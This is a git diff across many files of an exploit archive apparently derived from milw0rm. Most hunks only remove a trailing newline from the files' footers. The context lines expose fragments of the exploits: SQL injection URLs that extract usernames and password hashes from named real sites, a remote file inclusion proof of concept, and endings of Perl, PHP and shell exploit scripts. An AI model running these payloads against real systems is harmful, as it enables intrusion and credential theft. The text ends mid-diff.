--- a/platforms/php/webapps/9183.txt +++ b/platforms/php/webapps/9183.txt @@ -32,4 +32,4 @@ just look on the navigation bar to the side and click admin type your sql as the username and leave the password field blank. -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9184.txt b/platforms/php/webapps/9184.txt index 06922b35f..1ed88bded 100755 --- a/platforms/php/webapps/9184.txt +++ b/platforms/php/webapps/9184.txt @@ -14,4 +14,4 @@ http://www.ffme.fr/via-ferrata/SITE_fiche.php?id=136 Thanks for hack4love, rayo, saad, xweb, dbattack, x-sombrio, darkmaster and all 3asfh members -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9185.txt b/platforms/php/webapps/9185.txt index ef811d4e4..1911f524e 100755 --- a/platforms/php/webapps/9185.txt +++ b/platforms/php/webapps/9185.txt @@ -42,4 +42,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9187.txt b/platforms/php/webapps/9187.txt index 1c5ed0571..8480d3ec6 100755 --- a/platforms/php/webapps/9187.txt +++ b/platforms/php/webapps/9187.txt @@ -26,4 +26,4 @@ note: <license>GNU GPL</license> -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9193.pl b/platforms/php/webapps/9193.pl index 860aa7d6a..a62d152df 100755 --- a/platforms/php/webapps/9193.pl +++ b/platforms/php/webapps/9193.pl @@ -39,4 +39,4 @@ else print "\n[-] Exploit Failed...\n"; } -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9194.txt b/platforms/php/webapps/9194.txt index d1249fccd..069a8330d 100755 --- a/platforms/php/webapps/9194.txt +++ b/platforms/php/webapps/9194.txt @@ -56,4 +56,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9195.txt b/platforms/php/webapps/9195.txt index 9122678bf..9976f1a3c 100755 --- a/platforms/php/webapps/9195.txt +++ b/platforms/php/webapps/9195.txt @@ -56,4 +56,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9196.txt b/platforms/php/webapps/9196.txt index 4d58efadd..62c6a3c25 100755 --- a/platforms/php/webapps/9196.txt +++ b/platforms/php/webapps/9196.txt @@ -58,4 +58,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9202.txt b/platforms/php/webapps/9202.txt index fd1515c5c..2498f5d4e 100755 --- a/platforms/php/webapps/9202.txt +++ b/platforms/php/webapps/9202.txt @@ -22,4 +22,4 @@ Sql: silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name, ####################################################################### Thanks: m3rcil3sS & GhostKing & milw0rm & All Turkısh Attackers -# milw0rm.com [2009-07-20] +# milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/9203.txt b/platforms/php/webapps/9203.txt index 733794088..51199fed5 100755 --- a/platforms/php/webapps/9203.txt +++ b/platforms/php/webapps/9203.txt @@ -33,4 +33,4 @@ http://cms.netrix.hu/admin/cikkform.php?cid=1 u can edit anything or put on your index ;) -# milw0rm.com [2009-07-20] +# milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/9204.txt b/platforms/php/webapps/9204.txt index 10d16de7f..127cdd24a 100755 --- a/platforms/php/webapps/9204.txt +++ b/platforms/php/webapps/9204.txt @@ -63,4 +63,4 @@ ================================================================================================ -# milw0rm.com [2009-07-20] +# milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/9205.txt b/platforms/php/webapps/9205.txt index 8183c4765..75ca292b1 100755 --- a/platforms/php/webapps/9205.txt +++ b/platforms/php/webapps/9205.txt @@ -73,4 +73,4 @@ $upload = move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile); ############################################################################################ -# milw0rm.com [2009-07-20] +# milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/921.sh b/platforms/php/webapps/921.sh index f6bf10715..f34d64d80 100755 --- a/platforms/php/webapps/921.sh +++ b/platforms/php/webapps/921.sh @@ -35,4 +35,4 @@ echo -e "\n - Anonymous Query URL: "$anon_query_url "\n"; echo -e " - Direct Query URL: " $query_url "\n"; echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n" -# milw0rm.com [2005-04-07] +# milw0rm.com [2005-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/9211.txt b/platforms/php/webapps/9211.txt index dab17d766..aaf8e9a4b 100755 --- a/platforms/php/webapps/9211.txt +++ b/platforms/php/webapps/9211.txt @@ -47,4 +47,4 @@ nas04 Enjoy !! -# milw0rm.com [2009-07-20] +# milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/9217.txt b/platforms/php/webapps/9217.txt index 826be21ec..aae5cb154 100755 --- a/platforms/php/webapps/9217.txt +++ b/platforms/php/webapps/9217.txt @@ -30,4 +30,4 @@ ================================================================================================ -# milw0rm.com [2009-07-20] +# milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/9219.txt b/platforms/php/webapps/9219.txt index c944f0d53..215ed1c48 100755 --- a/platforms/php/webapps/9219.txt +++ b/platforms/php/webapps/9219.txt @@ -46,4 +46,4 @@ <<->> special greetz to tryag acadamy members -# milw0rm.com [2009-07-20] +# milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/9225.txt b/platforms/php/webapps/9225.txt index 22beab670..976153f5c 100755 --- a/platforms/php/webapps/9225.txt +++ b/platforms/php/webapps/9225.txt @@ -22,4 +22,4 @@ # # -# milw0rm.com [2009-07-21] +# milw0rm.com [2009-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/9226.txt b/platforms/php/webapps/9226.txt index 14f427223..d9e34921b 100755 --- a/platforms/php/webapps/9226.txt +++ b/platforms/php/webapps/9226.txt @@ -35,4 +35,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-21] +# milw0rm.com [2009-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/9227.txt b/platforms/php/webapps/9227.txt index d0d99b5cb..ae345d208 100755 --- a/platforms/php/webapps/9227.txt +++ b/platforms/php/webapps/9227.txt @@ -43,4 +43,4 @@ Author: Moudi note: readfile($url) is the issue, so fd -# milw0rm.com [2009-07-21] +# milw0rm.com [2009-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/9231.txt b/platforms/php/webapps/9231.txt index f238a99dc..922e31745 100755 --- a/platforms/php/webapps/9231.txt +++ b/platforms/php/webapps/9231.txt @@ -86,4 +86,4 @@ crashfr at sysdream dot com Virtualabs -# milw0rm.com [2009-07-22] +# milw0rm.com [2009-07-22] \ No newline at end of file diff --git a/platforms/php/webapps/9235.php b/platforms/php/webapps/9235.php index c24798a8f..c0490d655 100755 --- a/platforms/php/webapps/9235.php +++ b/platforms/php/webapps/9235.php @@ -75,4 +75,4 @@ function sendpacket($host,$data) { ?> -# milw0rm.com [2009-07-23] +# milw0rm.com [2009-07-23] \ No newline at end of file diff --git a/platforms/php/webapps/9236.txt b/platforms/php/webapps/9236.txt index 91c5b3fcd..d58bac2d6 100755 --- a/platforms/php/webapps/9236.txt +++ b/platforms/php/webapps/9236.txt @@ -36,4 +36,4 @@ _________________________________________________________________ # ######################################################################################################### -# milw0rm.com [2009-07-23] +# milw0rm.com [2009-07-23] \ No newline at end of file diff --git a/platforms/php/webapps/9237.txt b/platforms/php/webapps/9237.txt index 0ca48f02b..97baeff79 100755 --- a/platforms/php/webapps/9237.txt +++ b/platforms/php/webapps/9237.txt @@ -60,4 +60,4 @@ www.arab4services.net |+------------------------------------------------+ | \---------------------------------------------------/ -# milw0rm.com [2009-07-23] +# milw0rm.com [2009-07-23] \ No newline at end of file diff --git a/platforms/php/webapps/9238.txt b/platforms/php/webapps/9238.txt index e885a0a13..792b4ad35 100755 --- a/platforms/php/webapps/9238.txt +++ b/platforms/php/webapps/9238.txt @@ -19,4 +19,4 @@ demo: ----- http://www.xxx.com/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users-- -# milw0rm.com [2009-07-23] +# milw0rm.com [2009-07-23] \ No newline at end of file diff --git a/platforms/php/webapps/9239.txt b/platforms/php/webapps/9239.txt index 48e8c3ce8..664a5ad24 100755 --- a/platforms/php/webapps/9239.txt +++ b/platforms/php/webapps/9239.txt @@ -87,4 +87,4 @@ Special greetings to my brother d4ng3r ;) [!] Produced in South America --------------------------------- -# milw0rm.com [2009-07-23] +# milw0rm.com [2009-07-23] \ No newline at end of file diff --git a/platforms/php/webapps/9243.txt b/platforms/php/webapps/9243.txt index 757c008cf..fa0cc1e44 100755 --- a/platforms/php/webapps/9243.txt +++ b/platforms/php/webapps/9243.txt @@ -54,4 +54,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9244.txt b/platforms/php/webapps/9244.txt index b31e5d9b6..92fc0cc94 100755 --- a/platforms/php/webapps/9244.txt +++ b/platforms/php/webapps/9244.txt @@ -32,4 +32,4 @@ _________________________________________________________________ # ######################################################################################################### -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9246.txt b/platforms/php/webapps/9246.txt index 3d47b1922..b0813bfd3 100755 --- a/platforms/php/webapps/9246.txt +++ b/platforms/php/webapps/9246.txt @@ -52,4 +52,4 @@ ================================================================================================== -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9248.txt b/platforms/php/webapps/9248.txt index 7cc397b69..4086cc58b 100755 --- a/platforms/php/webapps/9248.txt +++ b/platforms/php/webapps/9248.txt @@ -64,4 +64,4 @@ password: SwEET-DeViL |+------------------------------------------------+ | \---------------------------------------------------/ -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9249.txt b/platforms/php/webapps/9249.txt index a155b15ff..7a520c996 100755 --- a/platforms/php/webapps/9249.txt +++ b/platforms/php/webapps/9249.txt @@ -20,4 +20,4 @@ Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4 [From Brazil] ************************************************************************************************************ -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9250.sh b/platforms/php/webapps/9250.sh index 5ab5aae0e..1b7ff2996 100755 --- a/platforms/php/webapps/9250.sh +++ b/platforms/php/webapps/9250.sh @@ -35,4 +35,4 @@ echo "[!] delivering data" echo "[X] all done. now wait for admin to mouse-over that name." -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9251.txt b/platforms/php/webapps/9251.txt index bc821017a..a50dce2ab 100755 --- a/platforms/php/webapps/9251.txt +++ b/platforms/php/webapps/9251.txt @@ -29,4 +29,4 @@ Deonixscripts Templates Management Version 1.3 SQL Injection Vulnerability ##################################################### From Tiny little island of Maldivies -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9252.txt b/platforms/php/webapps/9252.txt index c5361a462..cb90f6bac 100755 --- a/platforms/php/webapps/9252.txt +++ b/platforms/php/webapps/9252.txt @@ -149,4 +149,4 @@ function getArguments() // ************************************* ?> -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9254.txt b/platforms/php/webapps/9254.txt index f1bfd00d9..278931dd2 100755 --- a/platforms/php/webapps/9254.txt +++ b/platforms/php/webapps/9254.txt @@ -26,4 +26,4 @@ or, if you want to mess only just with the operators, http://www.site.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_admin%20limit%200,1 -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9255.txt b/platforms/php/webapps/9255.txt index 7b6cd072c..7f8f0a4fb 100755 --- a/platforms/php/webapps/9255.txt +++ b/platforms/php/webapps/9255.txt @@ -87,4 +87,4 @@ nah ````````````````` Salamz to All Muslim Hackers. -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9256.txt b/platforms/php/webapps/9256.txt index 68605d7d0..f7b1c20c5 100755 --- a/platforms/php/webapps/9256.txt +++ b/platforms/php/webapps/9256.txt @@ -78,4 +78,4 @@ nah ````````````````` Salamz to All Muslim Hackers. -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9257.php b/platforms/php/webapps/9257.php index c835349aa..884905476 100755 --- a/platforms/php/webapps/9257.php +++ b/platforms/php/webapps/9257.php @@ -97,4 +97,4 @@ print_r(QABANDI($host1,$userdir1,$file)); } ?> -# milw0rm.com [2009-07-24] +# milw0rm.com [2009-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/9258.txt b/platforms/php/webapps/9258.txt index c41d1f79b..92f19c887 100755 --- a/platforms/php/webapps/9258.txt +++ b/platforms/php/webapps/9258.txt @@ -50,4 +50,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9259.txt b/platforms/php/webapps/9259.txt index c0019ce50..89fdf1cb6 100755 --- a/platforms/php/webapps/9259.txt +++ b/platforms/php/webapps/9259.txt @@ -50,4 +50,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9260.txt b/platforms/php/webapps/9260.txt index fe09a3971..2464304ad 100755 --- a/platforms/php/webapps/9260.txt +++ b/platforms/php/webapps/9260.txt @@ -50,4 +50,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9261.txt b/platforms/php/webapps/9261.txt index 7841a4541..a629cd092 100755 --- a/platforms/php/webapps/9261.txt +++ b/platforms/php/webapps/9261.txt @@ -59,4 +59,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9262.txt b/platforms/php/webapps/9262.txt index cf3971c48..32f3bdf4d 100755 --- a/platforms/php/webapps/9262.txt +++ b/platforms/php/webapps/9262.txt @@ -50,4 +50,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9263.txt b/platforms/php/webapps/9263.txt index d864969d8..2bee6eda6 100755 --- a/platforms/php/webapps/9263.txt +++ b/platforms/php/webapps/9263.txt @@ -76,4 +76,4 @@ else{print "\n> Exploit failed! <\n"; #[!] Produced in South America #--------------------------------- -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9266.txt b/platforms/php/webapps/9266.txt index dcf417309..138dc56bb 100755 --- a/platforms/php/webapps/9266.txt +++ b/platforms/php/webapps/9266.txt @@ -25,4 +25,4 @@ ############################################################################################ -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9267.txt b/platforms/php/webapps/9267.txt index 49c8781e3..9592282bf 100755 --- a/platforms/php/webapps/9267.txt +++ b/platforms/php/webapps/9267.txt @@ -19,4 +19,4 @@ # http://www.vspanel.gr/results.php?Cat_ID=null++union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- # ######################################################################################################################################################## -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9269.txt b/platforms/php/webapps/9269.txt index f7465229a..4e5afc8f2 100755 --- a/platforms/php/webapps/9269.txt +++ b/platforms/php/webapps/9269.txt @@ -36,4 +36,4 @@ _______ ___________ und natürlich kann geschossen werden!" (Ulrike Meinhof, 1970)" [=] -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9270.txt b/platforms/php/webapps/9270.txt index ae6fb9b7f..6f0742189 100755 --- a/platforms/php/webapps/9270.txt +++ b/platforms/php/webapps/9270.txt @@ -23,4 +23,4 @@ http://www.thepharmaclassifieds.com/index.php?s=-6+union+select+1,2,3,4,5-- ---------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9271.txt b/platforms/php/webapps/9271.txt index 8b4bba228..3bf49cb65 100755 --- a/platforms/php/webapps/9271.txt +++ b/platforms/php/webapps/9271.txt @@ -57,4 +57,4 @@ Password : advertiser http://www.inoutscripts.com/demo/inout_adserver/ppc-add-keywords.php?id=348+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users-- -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9273.php b/platforms/php/webapps/9273.php index 726108363..3a6f49a36 100755 --- a/platforms/php/webapps/9273.php +++ b/platforms/php/webapps/9273.php @@ -241,4 +241,4 @@ echo "\n\n this exploit is made to give you the first 8 chars of username and fi ?> -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9274.php b/platforms/php/webapps/9274.php index bf152ff37..d2e7eb2e0 100755 --- a/platforms/php/webapps/9274.php +++ b/platforms/php/webapps/9274.php @@ -241,4 +241,4 @@ echo "\n\n this exploit is made to give you the first 8 chars of username and fi ?> -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9275.php b/platforms/php/webapps/9275.php index 2b458ce08..e6aef2d72 100755 --- a/platforms/php/webapps/9275.php +++ b/platforms/php/webapps/9275.php @@ -241,4 +241,4 @@ echo "\n\n this exploit is made to give you the first 8 chars of username and fi ?> -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9276.txt b/platforms/php/webapps/9276.txt index 514148595..b9401d4cf 100755 --- a/platforms/php/webapps/9276.txt +++ b/platforms/php/webapps/9276.txt @@ -47,4 +47,4 @@ July 25, 2009 – Advisory goes public Disclosed Not yet published in any database -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9279.pl b/platforms/php/webapps/9279.pl index b5f1b02a8..939c8626d 100755 --- a/platforms/php/webapps/9279.pl +++ b/platforms/php/webapps/9279.pl @@ -109,4 +109,4 @@ sub refresh{ #WaRWolFz Crew -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/928.py b/platforms/php/webapps/928.py index c83c6a88c..d874c2b32 100755 --- a/platforms/php/webapps/928.py +++ b/platforms/php/webapps/928.py @@ -126,4 +126,4 @@ def main(): if __name__ == "__main__": main() -# milw0rm.com [2005-04-11] +# milw0rm.com [2005-04-11] \ No newline at end of file diff --git a/platforms/php/webapps/9280.pl b/platforms/php/webapps/9280.pl index 4f506c25e..9eca3e485 100755 --- a/platforms/php/webapps/9280.pl +++ b/platforms/php/webapps/9280.pl @@ -109,4 +109,4 @@ sub refresh{ #WaRWolFz Crew -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9281.txt b/platforms/php/webapps/9281.txt index 13e5494da..a2b62ff11 100755 --- a/platforms/php/webapps/9281.txt +++ b/platforms/php/webapps/9281.txt @@ -39,4 +39,4 @@ WHERE user='$username' AND pass='$password'"); ############################################################################################ -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9282.txt b/platforms/php/webapps/9282.txt index 360193e07..097ca142c 100755 --- a/platforms/php/webapps/9282.txt +++ b/platforms/php/webapps/9282.txt @@ -38,4 +38,4 @@ Author: Evil-Cod3r <- ########################################################################### -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9283.txt b/platforms/php/webapps/9283.txt index bc8a283d3..e742b7b09 100755 --- a/platforms/php/webapps/9283.txt +++ b/platforms/php/webapps/9283.txt @@ -35,4 +35,4 @@ Author: Evil-Cod3r <- ########################################################################### -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9284.txt b/platforms/php/webapps/9284.txt index 9b5ef6496..3e69539cc 100755 --- a/platforms/php/webapps/9284.txt +++ b/platforms/php/webapps/9284.txt @@ -6,4 +6,4 @@ POC: /load_phplib.php?_PHPLIB[libdir]=Shell Us = php_flag magic_quotes_gpc Off / php_flag magic_quotes_runtime Off -# milw0rm.com [2009-07-27] +# milw0rm.com [2009-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/9287.txt b/platforms/php/webapps/9287.txt index 583ce4ce1..469fcd205 100755 --- a/platforms/php/webapps/9287.txt +++ b/platforms/php/webapps/9287.txt @@ -9,4 +9,4 @@ [+] Note : You can see the information like this "The requested URL /mail/[INFORMATION SQL] was not found on this server." ------------------------------------------------------------------------------------------- -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9288.txt b/platforms/php/webapps/9288.txt index e7b8ec8ae..8ce33fffd 100755 --- a/platforms/php/webapps/9288.txt +++ b/platforms/php/webapps/9288.txt @@ -18,4 +18,4 @@ SQL CODE : null+union+select+1,2,3,4,5,6,7,8,9,10,11-- ---------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9289.pl b/platforms/php/webapps/9289.pl index 50a08df66..aba983877 100755 --- a/platforms/php/webapps/9289.pl +++ b/platforms/php/webapps/9289.pl @@ -146,4 +146,4 @@ sub refresh{ #WaRWolFz Crew -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9290.txt b/platforms/php/webapps/9290.txt index e161bba08..c44a17a1f 100755 --- a/platforms/php/webapps/9290.txt +++ b/platforms/php/webapps/9290.txt @@ -40,4 +40,4 @@ http://www.in-portal.net/demo Yemeni ana ;) -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9292.txt b/platforms/php/webapps/9292.txt index b61ad84c0..b84ac79a1 100755 --- a/platforms/php/webapps/9292.txt +++ b/platforms/php/webapps/9292.txt @@ -19,4 +19,4 @@ download : http://zenas.org/paobacheca/download/scarica.html ############################################################################# -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9293.txt b/platforms/php/webapps/9293.txt index 6fe823cbb..878a653bf 100755 --- a/platforms/php/webapps/9293.txt +++ b/platforms/php/webapps/9293.txt @@ -19,4 +19,4 @@ download : http://zenas.org/paobacheca/download/scarica.html ############################################################################# -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9294.txt b/platforms/php/webapps/9294.txt index bf6fa0726..f98d61431 100755 --- a/platforms/php/webapps/9294.txt +++ b/platforms/php/webapps/9294.txt @@ -19,4 +19,4 @@ download : http://zenas.org/paobacheca/download/scarica.html ############################################################################# -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9296.txt b/platforms/php/webapps/9296.txt index 13328908c..526a159e6 100755 --- a/platforms/php/webapps/9296.txt +++ b/platforms/php/webapps/9296.txt @@ -96,4 +96,4 @@ All major actions such as create, delete, rename files/folders are GET/POST XSRF ######################################################################################### -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9297.txt b/platforms/php/webapps/9297.txt index cfc1b879c..42da8911e 100755 --- a/platforms/php/webapps/9297.txt +++ b/platforms/php/webapps/9297.txt @@ -41,4 +41,4 @@ ===================================================================================== -# milw0rm.com [2009-07-28] +# milw0rm.com [2009-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/9307.txt b/platforms/php/webapps/9307.txt index eb6b54692..00c1fcc49 100755 --- a/platforms/php/webapps/9307.txt +++ b/platforms/php/webapps/9307.txt @@ -46,4 +46,4 @@ Poc / _____ \ | `----./ _____ \ | '--' || |____ | | | | | | /__/ \__\ \______/__/ \__\ |_______/ |_______||__| |__| |__| -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9308.txt b/platforms/php/webapps/9308.txt index 800be889a..fa1c44904 100755 --- a/platforms/php/webapps/9308.txt +++ b/platforms/php/webapps/9308.txt @@ -23,4 +23,4 @@ ################################################################################################################## -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9309.txt b/platforms/php/webapps/9309.txt index a3c42dc2d..46670b349 100755 --- a/platforms/php/webapps/9309.txt +++ b/platforms/php/webapps/9309.txt @@ -94,4 +94,4 @@ Upload <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+] ################################################################################################################################################ -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9310.txt b/platforms/php/webapps/9310.txt index 6b45e79e5..e00c48561 100755 --- a/platforms/php/webapps/9310.txt +++ b/platforms/php/webapps/9310.txt @@ -44,4 +44,4 @@ ########################################################################################################## -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9311.txt b/platforms/php/webapps/9311.txt index a472a6e16..e8ba96d38 100755 --- a/platforms/php/webapps/9311.txt +++ b/platforms/php/webapps/9311.txt @@ -23,4 +23,4 @@ ################################################################################################### -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9312.txt b/platforms/php/webapps/9312.txt index fa60a761d..64f59e57b 100755 --- a/platforms/php/webapps/9312.txt +++ b/platforms/php/webapps/9312.txt @@ -34,4 +34,4 @@ ############################################################################################################################################### -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9313.txt b/platforms/php/webapps/9313.txt index 24a4b0698..f3a57785c 100755 --- a/platforms/php/webapps/9313.txt +++ b/platforms/php/webapps/9313.txt @@ -29,4 +29,4 @@ require_once($PTF); ############################################################################################ -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9314.txt b/platforms/php/webapps/9314.txt index 981b4c205..613164c0c 100755 --- a/platforms/php/webapps/9314.txt +++ b/platforms/php/webapps/9314.txt @@ -24,4 +24,4 @@ #################################################################################### -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9315.pl b/platforms/php/webapps/9315.pl index 7c6972676..946963df1 100755 --- a/platforms/php/webapps/9315.pl +++ b/platforms/php/webapps/9315.pl @@ -94,4 +94,4 @@ sub refresh{ #WaRWolFz -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9316.txt b/platforms/php/webapps/9316.txt index 0e1c078ee..d1cdb5559 100755 --- a/platforms/php/webapps/9316.txt +++ b/platforms/php/webapps/9316.txt @@ -51,4 +51,4 @@ =============================================================================================== -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/9320.php b/platforms/php/webapps/9320.php index e12b2b823..8a2ea7163 100755 --- a/platforms/php/webapps/9320.php +++ b/platforms/php/webapps/9320.php @@ -171,4 +171,4 @@ ?> -# milw0rm.com [2009-08-01] +# milw0rm.com [2009-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/9322.txt b/platforms/php/webapps/9322.txt index 1593b3c08..835586ebb 100755 --- a/platforms/php/webapps/9322.txt +++ b/platforms/php/webapps/9322.txt @@ -86,4 +86,4 @@ =============================================================================================== -# milw0rm.com [2009-08-01] +# milw0rm.com [2009-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/9324.txt b/platforms/php/webapps/9324.txt index 13779b40b..33d182f78 100755 --- a/platforms/php/webapps/9324.txt +++ b/platforms/php/webapps/9324.txt @@ -142,4 +142,4 @@ else {print " [-] Exploit Fallo :(\n";} -# milw0rm.com [2009-08-01] +# milw0rm.com [2009-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/9325.txt b/platforms/php/webapps/9325.txt index c9ea9dcc7..fa3ef12b3 100755 --- a/platforms/php/webapps/9325.txt +++ 